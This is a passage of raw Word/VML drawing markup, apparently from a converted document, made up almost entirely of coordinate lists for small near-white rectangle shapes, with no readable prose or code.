2680,11125,2680,11123,2680,11122,2680,11121,2680,11119,2680,11118,2680,11117,2680,11115,2680,11114,2680,11112,2680,11110,2680,11109,2680,11107,2680,11105,2680,11103,2680,11101,2680,11099,2680,11097,2680,11095,2680,11093,2680,11090,2680,11088,2680,11086,2680,11083,2680,11081,2680,11078,2680,11075,2680,11073,2680,11070,2680,11067,2680,11064,2680,11061,2680,11058,2680,11055,2680,11052,2680,11048,2680,11045,2680,11041,2680,11038,2680,11034,2680,11031,2680,11027,2680,11023,2680,11019,2680,11015,2680,11011,2680,11006,2680,11002,2680,10998,2680,10993,2680,10989,2680,10984,2680,10979,2680,10974,2680,10969,2680,10964,2680,10959,2680,10954,2680,10949,2680,10943,2680,10938,2680,10932,2680,10926,2680,10920,2680,10914,2680,10908,2680,10902,2680,10896,2680,10889e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:575.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,11510" coordsize="130,250">
        <v:shape style="position:absolute;left:2670;top:11510;width:130;height:250" coordorigin="2670,11510" coordsize="130,250" path="m2680,11520l2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2680,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2681,11520,2682,11520,2682,11520,2682,11520,2682,11520,2682,11520,2682,11520,2683,11520,2683,11520,2683,11520,2683,11520,2684,11520,2684,11520,2684,11520,2685,11520,2685,11520,2685,11520,2686,11520,2686,11520,2686,11520,2687,11520,2687,11520,2688,11520,2688,11520,2689,11520,2689,11520,2690,11520,2690,11520,2691,11520,2692,11520,2692,11520,2693,11520,2694,11520,2694,11520,2695,11520,2696,11520,2697,11520,2697,11520,2698,11520,2699,11520,2700,11520,2701,11520,2702,11520,2703,11520,2704,11520,2705,11520,2706,11520,2707,11520,2708,11520,2709,11520,2710,11520,2712,11520,2713,11520,2714,11520,2715,11520,2717,11520,2718,11520,2720,11520,2721,11520,2723,11520,2724,11520,2726,11520,2727,11520,2729,11520,2731,11520,2732,11520,2734,11520,2736,11520,2738,11520,2740,11520,2741,11520,2743,11520,2745,11520,2747,11520,2749,11520,2752,11520,2754,11520,2756,11520,2758,11520,2760,11520,2763,11520,2765,11520,2768,11520,2770,11520,2773,11520,2775,11520,2778,11520,2780,11520,2783,11520,2786,11520,2789,11520,2792,11520,2794,11520,2797,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11520,2800,11521,2800,11521,2800,11521,2800,11521,2800,11521,2800,11521,2800,11522,2800,11522,2800,11522,2800,11522,2800,11523,2800,11523,2800,11523,2800,11524,2800,11524,2800,11525,2800,11525,2800,11526,2800,11526,2800,11527,2800,11527,2800,11528,2800,11529,2800,11529,2800,11530,2800,11531,2800,11532,2800,11533,2800,11534,2800,11535,2800,11536,2800,11537,2800,11538,2800,11539,2800,11540,2800,11541,2800,11542,2800,11544,2800,11545,2800,11546,2800,11548,2800,11549,2800,11551,2800,11553,2800,11554,2800,11556,2800,11558,2800,11559,2800,11561,2800,11563,2800,11565,2800,11567,2800,11570,2800,11572,2800,11574,2800,11576,2800,11579,2800,11581,2800,11584,2800,11586,2800,11589,2800,11592,2800,11594,2800,11597,2800,11600,2800,11603,2800,11606,2800,11610,2800,11613,2800,11616,2800,11620,2800,11623,2800,11627,2800,11630,2800,11634,2800,11638,2800,11642,2800,11646,2800,11650,2800,11654,2800,11658,2800,11662,2800,11667,2800,11671,2800,11676,2800,11680,2800,11685,2800,11690,2800,11695,2800,11700,2800,11705,2800,11711,2800,11716,2800,11721,2800,11727,2800,11733,2800,11738,2800,11744,2800,11750,2800,11756,2800,11762,2800,11769,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2799,11775,2799,11775,2799,11775,2799,11775,2799,11775,2799,11775,2798,11775,2798,11775,2798,11775,2798,11775,2798,11775,2797,11775,2797,11775,2797,11775,2797,11775,2796,11775,2796,11775,2795,11775,2795,11775,2795,11775,2794,11775,2794,11775,2793,11775,2793,11775,2793,11775,2792,11775,2792,11775,2791,11775,2790,11775,2790,11775,2789,11775,2789,11775,2788,11775,2787,11775,2787,11775,2786,11775,2785,11775,2784,11775,2783,11775,2783,11775,2782,11775,2781,11775,2780,11775,2779,11775,2778,11775,2777,11775,2776,11775,2775,11775,2774,11775,2773,11775,2772,11775,2770,11775,2769,11775,2768,11775,2767,11775,2765,11775,2764,11775,2763,11775,2761,11775,2760,11775,2758,11775,2757,11775,2755,11775,2753,11775,2752,11775,2750,11775,2748,11775,2747,11775,2745,11775,2743,11775,2741,11775,2739,11775,2737,11775,2735,11775,2733,11775,2731,11775,2729,11775,2727,11775,2725,11775,2723,11775,2720,11775,2718,11775,2716,11775,2713,11775,2711,11775,2708,11775,2706,11775,2703,11775,2700,11775,2698,11775,2695,11775,2692,11775,2689,11775,2686,11775,2683,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11774,2680,11774,2680,11774,2680,11774,2680,11774,2680,11774,2680,11774,2680,11773,2680,11773,2680,11773,2680,11773,2680,11772,2680,11772,2680,11772,2680,11771,2680,11771,2680,11770,2680,11770,2680,11769,2680,11769,2680,11768,2680,11768,2680,11767,2680,11767,2680,11766,2680,11765,2680,11764,2680,11764,2680,11763,2680,11762,2680,11761,2680,11760,2680,11759,2680,11758,2680,11757,2680,11756,2680,11755,2680,11754,2680,11752,2680,11751,2680,11750,2680,11748,2680,11747,2680,11745,2680,11744,2680,11742,2680,11741,2680,11739,2680,11737,2680,11735,2680,11733,2680,11731,2680,11729,2680,11727,2680,11725,2680,11723,2680,11721,2680,11718,2680,11716,2680,11714,2680,11711,2680,11708,2680,11706,2680,11703,2680,11700,2680,11697,2680,11694,2680,11691,2680,11688,2680,11685,2680,11682,2680,11679,2680,11675,2680,11672,2680,11668,2680,11665,2680,11661,2680,11657,2680,11653,2680,11649,2680,11645,2680,11641,2680,11637,2680,11632,2680,11628,2680,11624,2680,11619,2680,11614,2680,11609,2680,11605,2680,11600,2680,11595,2680,11589,2680,11584,2680,11579,2680,11573,2680,11568,2680,11562,2680,11556,2680,11551,2680,11545,2680,11539,2680,11532,2680,11526,2680,11520e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:607.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,12150" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:12150;width:130;height:270" coordorigin="2670,12150" coordsize="130,270" path="m2680,12165l2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2682,12165,2682,12165,2682,12165,2682,12165,2682,12165,2682,12165,2683,12165,2683,12165,2683,12165,2683,12165,2684,12165,2684,12165,2684,12165,2685,12165,2685,12165,2685,12165,2686,12165,2686,12165,2686,12165,2687,12165,2687,12165,2688,12165,2688,12165,2689,12165,2689,12165,2690,12165,2690,12165,2691,12165,2692,12165,2692,12165,2693,12165,2694,12165,2694,12165,2695,12165,2696,12165,2697,12165,2697,12165,2698,12165,2699,12165,2700,12165,2701,12165,2702,12165,2703,12165,2704,12165,2705,12165,2706,12165,2707,12165,2708,12165,2709,12165,2710,12165,2712,12165,2713,12165,2714,12165,2715,12165,2717,12165,2718,12165,2720,12165,2721,12165,2723,12165,2724,12165,2726,12165,2727,12165,2729,12165,2731,12165,2732,12165,2734,12165,2736,12165,2738,12165,2740,12165,2741,12165,2743,12165,2745,12165,2747,12165,2749,12165,2752,12165,2754,12165,2756,12165,2758,12165,2760,12165,2763,12165,2765,12165,2768,12165,2770,12165,2773,12165,2775,12165,2778,12165,2780,12165,2783,12165,2786,12165,2789,12165,2792,12165,2794,12165,2797,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12166,2800,12166,2800,12166,2800,12166,2800,12166,2800,12166,2800,12166,2800,12167,2800,12167,2800,12167,2800,12167,2800,12167,2800,12168,2800,12168,2800,12168,2800,12169,2800,12169,2800,12170,2800,12170,2800,12171,2800,12171,2800,12172,2800,12172,2800,12173,2800,12173,2800,12174,2800,12175,2800,12176,2800,12176,2800,12177,2800,12178,2800,12179,2800,12180,2800,12181,2800,12182,2800,12183,2800,12184,2800,12185,2800,12186,2800,12188,2800,12189,2800,12190,2800,12192,2800,12193,2800,12195,2800,12196,2800,12198,2800,12199,2800,12201,2800,12203,2800,12205,2800,12207,2800,12209,2800,12211,2800,12213,2800,12215,2800,12217,2800,12219,2800,12222,2800,12224,2800,12226,2800,12229,2800,12232,2800,12234,2800,12237,2800,12240,2800,12243,2800,12246,2800,12249,2800,12252,2800,12255,2800,12258,2800,12261,2800,12265,2800,12268,2800,12272,2800,12275,2800,12279,2800,12283,2800,12287,2800,12291,2800,12295,2800,12299,2800,12303,2800,12308,2800,12312,2800,12317,2800,12321,2800,12326,2800,12331,2800,12335,2800,12340,2800,12345,2800,12351,2800,12356,2800,12361,2800,12367,2800,12372,2800,12378,2800,12384,2800,12389,2800,12395,2800,12401,2800,12408,2800,12414,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2799,12420,2799,12420,2799,12420,2799,12420,2799,12420,2799,12420,2798,12420,2798,12420,2798,12420,2798,12420,2798,12420,2797,12420,2797,12420,2797,12420,2797,12420,2796,12420,2796,12420,2795,12420,2795,12420,2795,12420,2794,12420,2794,12420,2793,12420,2793,12420,2793,12420,2792,12420,2792,12420,2791,12420,2790,12420,2790,12420,2789,12420,2789,12420,2788,12420,2787,12420,2787,12420,2786,12420,2785,12420,2784,12420,2783,12420,2783,12420,2782,12420,2781,12420,2780,12420,2779,12420,2778,12420,2777,12420,2776,12420,2775,12420,2774,12420,2773,12420,2772,12420,2770,12420,2769,12420,2768,12420,2767,12420,2765,12420,2764,12420,2763,12420,2761,12420,2760,12420,2758,12420,2757,12420,2755,12420,2753,12420,2752,12420,2750,12420,2748,12420,2747,12420,2745,12420,2743,12420,2741,12420,2739,12420,2737,12420,2735,12420,2733,12420,2731,12420,2729,12420,2727,12420,2725,12420,2723,12420,2720,12420,2718,12420,2716,12420,2713,12420,2711,12420,2708,12420,2706,12420,2703,12420,2700,12420,2698,12420,2695,12420,2692,12420,2689,12420,2686,12420,2683,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12419,2680,12419,2680,12419,2680,12419,2680,12419,2680,12418,2680,12418,2680,12418,2680,12418,2680,12417,2680,12417,2680,12417,2680,12416,2680,12416,2680,12415,2680,12415,2680,12414,2680,12414,2680,12413,2680,12413,2680,12412,2680,12411,2680,12411,2680,12410,2680,12409,2680,12408,2680,12407,2680,12406,2680,12406,2680,12405,2680,12404,2680,12402,2680,12401,2680,12400,2680,12399,2680,12398,2680,12396,2680,12395,2680,12394,2680,12392,2680,12391,2680,12389,2680,12388,2680,12386,2680,12384,2680,12382,2680,12381,2680,12379,2680,12377,2680,12375,2680,12373,2680,12371,2680,12368,2680,12366,2680,12364,2680,12361,2680,12359,2680,12356,2680,12354,2680,12351,2680,12348,2680,12346,2680,12343,2680,12340,2680,12337,2680,12334,2680,12331,2680,12327,2680,12324,2680,12321,2680,12317,2680,12314,2680,12310,2680,12306,2680,12302,2680,12298,2680,12295,2680,12290,2680,12286,2680,12282,2680,12278,2680,12273,2680,12269,2680,12264,2680,12260,2680,12255,2680,12250,2680,12245,2680,12240,2680,12235,2680,12230,2680,12224,2680,12219,2680,12213,2680,12208,2680,12202,2680,12196,2680,12190,2680,12184,2680,12178,2680,12172,2680,12165e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:638.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,12770" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:12770;width:130;height:270" coordorigin="2670,12770" coordsize="130,270" path="m2680,12795l2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2682,12795,2682,12795,2682,12795,2682,12795,2682,12795,2682,12795,2683,12795,2683,12795,2683,12795,2683,12795,2684,12795,2684,12795,2684,12795,2685,12795,2685,12795,2685,12795,2686,12795,2686,12795,2686,12795,2687,12795,2687,12795,2688,12795,2688,12795,2689,12795,2689,12795,2690,12795,2690,12795,2691,12795,2692,12795,2692,12795,2693,12795,2694,12795,2694,12795,2695,12795,2696,12795,2697,12795,2697,12795,2698,12795,2699,12795,2700,12795,2701,12795,2702,12795,2703,12795,2704,12795,2705,12795,2706,12795,2707,12795,2708,12795,2709,12795,2710,12795,2712,12795,2713,12795,2714,12795,2715,12795,2717,12795,2718,12795,2720,12795,2721,12795,2723,12795,2724,12795,2726,12795,2727,12795,2729,12795,2731,12795,2732,12795,2734,12795,2736,12795,2738,12795,2740,12795,2741,12795,2743,12795,2745,12795,2747,12795,2749,12795,2752,12795,2754,12795,2756,12795,2758,12795,2760,12795,2763,12795,2765,12795,2768,12795,2770,12795,2773,12795,2775,12795,2778,12795,2780,12795,2783,12795,2786,12795,2789,12795,2792,12795,2794,12795,2797,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12796,2800,12796,2800,12796,2800,12796,2800,12796,2800,12796,2800,12796,2800,12796,2800,12796,2800,12796,2800,12796,2800,12796,2800,12797,2800,12797,2800,12797,2800,12797,2800,12798,2800,12798,2800,12798,2800,12798,2800,12799,2800,12799,2800,12800,2800,12800,2800,12800,2800,12801,2800,12801,2800,12802,2800,12803,2800,12803,2800,12804,2800,12804,2800,12805,2800,12806,2800,12807,2800,12807,2800,12808,2800,12809,2800,12810,2800,12811,2800,12812,2800,12813,2800,12814,2800,12816,2800,12817,2800,12818,2800,12819,2800,12821,2800,12822,2800,12823,2800,12825,2800,12827,2800,12828,2800,12830,2800,12832,2800,12833,2800,12835,2800,12837,2800,12839,2800,12841,2800,12843,2800,12845,2800,12847,2800,12850,2800,12852,2800,12854,2800,12857,2800,12859,2800,12862,2800,12865,2800,12867,2800,12870,2800,12873,2800,12876,2800,12879,2800,12882,2800,12885,2800,12888,2800,12892,2800,12895,2800,12899,2800,12902,2800,12906,2800,12910,2800,12913,2800,12917,2800,12921,2800,12925,2800,12929,2800,12934,2800,12938,2800,12942,2800,12947,2800,12951,2800,12956,2800,12961,2800,12966,2800,12971,2800,12976,2800,12981,2800,12986,2800,12992,2800,12997,2800,13003,2800,13008,2800,13014,2800,13020,2800,13026,2800,13032,2800,13038,2800,13044,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2799,13051,2799,13051,2799,13051,2799,13051,2799,13051,2799,13051,2798,13051,2798,13051,2798,13051,2798,13051,2798,13051,2797,13051,2797,13051,2797,13051,2797,13051,2796,13051,2796,13051,2795,13051,2795,13051,2795,13051,2794,13051,2794,13051,2793,13051,2793,13051,2793,13051,2792,13051,2792,13051,2791,13051,2790,13051,2790,13051,2789,13051,2789,13051,2788,13051,2787,13051,2787,13051,2786,13051,2785,13051,2784,13051,2783,13051,2783,13051,2782,13051,2781,13051,2780,13051,2779,13051,2778,13051,2777,13051,2776,13051,2775,13051,2774,13051,2773,13051,2772,13051,2770,13051,2769,13051,2768,13051,2767,13051,2765,13051,2764,13051,2763,13051,2761,13051,2760,13051,2758,13051,2757,13051,2755,13051,2753,13051,2752,13051,2750,13051,2748,13051,2747,13051,2745,13051,2743,13051,2741,13051,2739,13051,2737,13051,2735,13051,2733,13051,2731,13051,2729,13051,2727,13051,2725,13051,2723,13051,2720,13051,2718,13051,2716,13051,2713,13051,2711,13051,2708,13051,2706,13051,2703,13051,2700,13051,2698,13051,2695,13051,2692,13051,2689,13051,2686,13051,2683,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13049,2680,13049,2680,13049,2680,13049,2680,13048,2680,13048,2680,13048,2680,13048,2680,13047,2680,13047,2680,13046,2680,13046,2680,13046,2680,13045,2680,13045,2680,13044,2680,13044,2680,13043,2680,13042,2680,13042,2680,13041,2680,13040,2680,13039,2680,13039,2680,13038,2680,13037,2680,13036,2680,13035,2680,13034,2680,13033,2680,13032,2680,13030,2680,13029,2680,13028,2680,13027,2680,13025,2680,13024,2680,13023,2680,13021,2680,13019,2680,13018,2680,13016,2680,13014,2680,13013,2680,13011,2680,13009,2680,13007,2680,13005,2680,13003,2680,13001,2680,12999,2680,12996,2680,12994,2680,12992,2680,12989,2680,12987,2680,12984,2680,12981,2680,12979,2680,12976,2680,12973,2680,12970,2680,12967,2680,12964,2680,12961,2680,12958,2680,12954,2680,12951,2680,12947,2680,12944,2680,12940,2680,12936,2680,12933,2680,12929,2680,12925,2680,12921,2680,12917,2680,12912,2680,12908,2680,12904,2680,12899,2680,12895,2680,12890,2680,12885,2680,12880,2680,12875,2680,12870,2680,12865,2680,12860,2680,12855,2680,12849,2680,12844,2680,12838,2680,12832,2680,12826,2680,12820,2680,12814,2680,12808,2680,12802,2680,12795e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:671.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,13430" coordsize="130,250">
        <v:shape style="position:absolute;left:2670;top:13430;width:130;height:250" coordorigin="2670,13430" coordsize="130,250" path="m2680,13441l2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2682,13441,2682,13441,2682,13441,2682,13441,2682,13441,2682,13441,2683,13441,2683,13441,2683,13441,2683,13441,2684,13441,2684,13441,2684,13441,2685,13441,2685,13441,2685,13441,2686,13441,2686,13441,2686,13441,2687,13441,2687,13441,2688,13441,2688,13441,2689,13441,2689,13441,2690,13441,2690,13441,2691,13441,2692,13441,2692,13441,2693,13441,2694,13441,2694,13441,2695,13441,2696,13441,2697,13441,2697,13441,2698,13441,2699,13441,2700,13441,2701,13441,2702,13441,2703,13441,2704,13441,2705,13441,2706,13441,2707,13441,2708,13441,2709,13441,2710,13441,2712,13441,2713,13441,2714,13441,2715,13441,2717,13441,2718,13441,2720,13441,2721,13441,2723,13441,2724,13441,2726,13441,2727,13441,2729,13441,2731,13441,2732,13441,2734,13441,2736,13441,2738,13441,2740,13441,2741,13441,2743,13441,2745,13441,2747,13441,2749,13441,2752,13441,2754,13441,2756,13441,2758,13441,2760,13441,2763,13441,2765,13441,2768,13441,2770,13441,2773,13441,2775,13441,2778,13441,2780,13441,2783,13441,2786,13441,2789,13441,2792,13441,2794,13441,2797,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13442,2800,13442,2800,13442,2800,13442,2800,13442,2800,13442,2800,13443,2800,13443,2800,13443,2800,13443,2800,13444,2800,13444,2800,13444,2800,13445,2800,13445,2800,13446,2800,13446,2800,13447,2800,13447,2800,13448,2800,13448,2800,13449,2800,13450,2800,13450,2800,13451,2800,13452,2800,13453,2800,13454,2800,13455,2800,13456,2800,13456,2800,13458,2800,13459,2800,13460,2800,13461,2800,13462,2800,13463,2800,13465,2800,13466,2800,13467,2800,13469,2800,13470,2800,13472,2800,13473,2800,13475,2800,13477,2800,13479,2800,13480,2800,13482,2800,13484,2800,13486,2800,13488,2800,13491,2800,13493,2800,13495,2800,13497,2800,13500,2800,13502,2800,13505,2800,13507,2800,13510,2800,13513,2800,13515,2800,13518,2800,13521,2800,13524,2800,13527,2800,13531,2800,13534,2800,13537,2800,13540,2800,13544,2800,13548,2800,13551,2800,13555,2800,13559,2800,13563,2800,13567,2800,13571,2800,13575,2800,13579,2800,13583,2800,13588,2800,13592,2800,13597,2800,13601,2800,13606,2800,13611,2800,13616,2800,13621,2800,13626,2800,13631,2800,13637,2800,13642,2800,13648,2800,13653,2800,13659,2800,13665,2800,13671,2800,13677,2800,13683,2800,13690,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2799,13696,2799,13696,2799,13696,2799,13696,2799,13696,2799,13696,2798,13696,2798,13696,2798,13696,2798,13696,2798,13696,2797,13696,2797,13696,2797,13696,2797,13696,2796,13696,2796,13696,2795,13696,2795,13696,2795,13696,2794,13696,2794,13696,2793,13696,2793,13696,2793,13696,2792,13696,2792,13696,2791,13696,2790,13696,2790,13696,2789,13696,2789,13696,2788,13696,2787,13696,2787,13696,2786,13696,2785,13696,2784,13696,2783,13696,2783,13696,2782,13696,2781,13696,2780,13696,2779,13696,2778,13696,2777,13696,2776,13696,2775,13696,2774,13696,2773,13696,2772,13696,2770,13696,2769,13696,2768,13696,2767,13696,2765,13696,2764,13696,2763,13696,2761,13696,2760,13696,2758,13696,2757,13696,2755,13696,2753,13696,2752,13696,2750,13696,2748,13696,2747,13696,2745,13696,2743,13696,2741,13696,2739,13696,2737,13696,2735,13696,2733,13696,2731,13696,2729,13696,2727,13696,2725,13696,2723,13696,2720,13696,2718,13696,2716,13696,2713,13696,2711,13696,2708,13696,2706,13696,2703,13696,2700,13696,2698,13696,2695,13696,2692,13696,2689,13696,2686,13696,2683,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13695,2680,13695,2680,13695,2680,13695,2680,13695,2680,13695,2680,13695,2680,13695,2680,13694,2680,13694,2680,13694,2680,13694,2680,13693,2680,13693,2680,13693,2680,13692,2680,13692,2680,13691,2680,13691,2680,13690,2680,13690,2680,13689,2680,13689,2680,13688,2680,13688,2680,13687,2680,13686,2680,13685,2680,13685,2680,13684,2680,13683,2680,13682,2680,13681,2680,13680,2680,13679,2680,13678,2680,13677,2680,13676,2680,13675,2680,13673,2680,13672,2680,13671,2680,13669,2680,13668,2680,13666,2680,13665,2680,13663,2680,13662,2680,13660,2680,13658,2680,13656,2680,13654,2680,13652,2680,13650,2680,13648,2680,13646,2680,13644,2680,13642,2680,13639,2680,13637,2680,13635,2680,13632,2680,13629,2680,13627,2680,13624,2680,13621,2680,13618,2680,13615,2680,13612,2680,13609,2680,13606,2680,13603,2680,13600,2680,13596,2680,13593,2680,13589,2680,13586,2680,13582,2680,13578,2680,13574,2680,13570,2680,13566,2680,13562,2680,13558,2680,13553,2680,13549,2680,13545,2680,13540,2680,13535,2680,13530,2680,13526,2680,13521,2680,13516,2680,13510,2680,13505,2680,13500,2680,13494,2680,13489,2680,13483,2680,13477,2680,13472,2680,13466,2680,13460,2680,13453,2680,13447,2680,13441e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:702.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,14050" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:14050;width:130;height:270" coordorigin="2670,14050" coordsize="130,270" path="m2680,14071l2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2682,14071,2682,14071,2682,14071,2682,14071,2682,14071,2682,14071,2683,14071,2683,14071,2683,14071,2683,14071,2684,14071,2684,14071,2684,14071,2685,14071,2685,14071,2685,14071,2686,14071,2686,14071,2686,14071,2687,14071,2687,14071,2688,14071,2688,14071,2689,14071,2689,14071,2690,14071,2690,14071,2691,14071,2692,14071,2692,14071,2693,14071,2694,14071,2694,14071,2695,14071,2696,14071,2697,14071,2697,14071,2698,14071,2699,14071,2700,14071,2701,14071,2702,14071,2703,14071,2704,14071,2705,14071,2706,14071,2707,14071,2708,14071,2709,14071,2710,14071,2712,14071,2713,14071,2714,14071,2715,14071,2717,14071,2718,14071,2720,14071,2721,14071,2723,14071,2724,14071,2726,14071,2727,14071,2729,14071,2731,14071,2732,14071,2734,14071,2736,14071,2738,14071,2740,14071,2741,14071,2743,14071,2745,14071,2747,14071,2749,14071,2752,14071,2754,14071,2756,14071,2758,14071,2760,14071,2763,14071,2765,14071,2768,14071,2770,14071,2773,14071,2775,14071,2778,14071,2780,14071,2783,14071,2786,14071,2789,14071,2792,14071,2794,14071,2797,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14073,2800,14073,2800,14073,2800,14073,2800,14074,2800,14074,2800,14074,2800,14075,2800,14075,2800,14076,2800,14076,2800,14077,2800,14077,2800,14078,2800,14078,2800,14079,2800,14079,2800,14080,2800,14081,2800,14082,2800,14082,2800,14083,2800,14084,2800,14085,2800,14086,2800,14087,2800,14088,2800,14089,2800,14090,2800,14091,2800,14092,2800,14094,2800,14095,2800,14096,2800,14098,2800,14099,2800,14101,2800,14102,2800,14104,2800,14105,2800,14107,2800,14109,2800,14111,2800,14113,2800,14115,2800,14117,2800,14119,2800,14121,2800,14123,2800,14125,2800,14128,2800,14130,2800,14132,2800,14135,2800,14138,2800,14140,2800,14143,2800,14146,2800,14149,2800,14152,2800,14155,2800,14158,2800,14161,2800,14164,2800,14167,2800,14171,2800,14174,2800,14178,2800,14181,2800,14185,2800,14189,2800,14193,2800,14197,2800,14201,2800,14205,2800,14209,2800,14214,2800,14218,2800,14222,2800,14227,2800,14232,2800,14237,2800,14241,2800,14246,2800,14251,2800,14257,2800,14262,2800,14267,2800,14273,2800,14278,2800,14284,2800,14290,2800,14295,2800,14301,2800,14307,2800,14314,2800,14320,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2799,14326,2799,14326,2799,14326,2799,14326,2799,14326,2799,14326,2798,14326,2798,14326,2798,14326,2798,14326,2798,14326,2797,14326,2797,14326,2797,14326,2797,14326,2796,14326,2796,14326,2795,14326,2795,14326,2795,14326,2794,14326,2794,14326,2793,14326,2793,14326,2793,14326,2792,14326,2792,14326,2791,14326,2790,14326,2790,14326,2789,14326,2789,14326,2788,14326,2787,14326,2787,14326,2786,14326,2785,14326,2784,14326,2783,14326,2783,14326,2782,14326,2781,14326,2780,14326,2779,14326,2778,14326,2777,14326,2776,14326,2775,14326,2774,1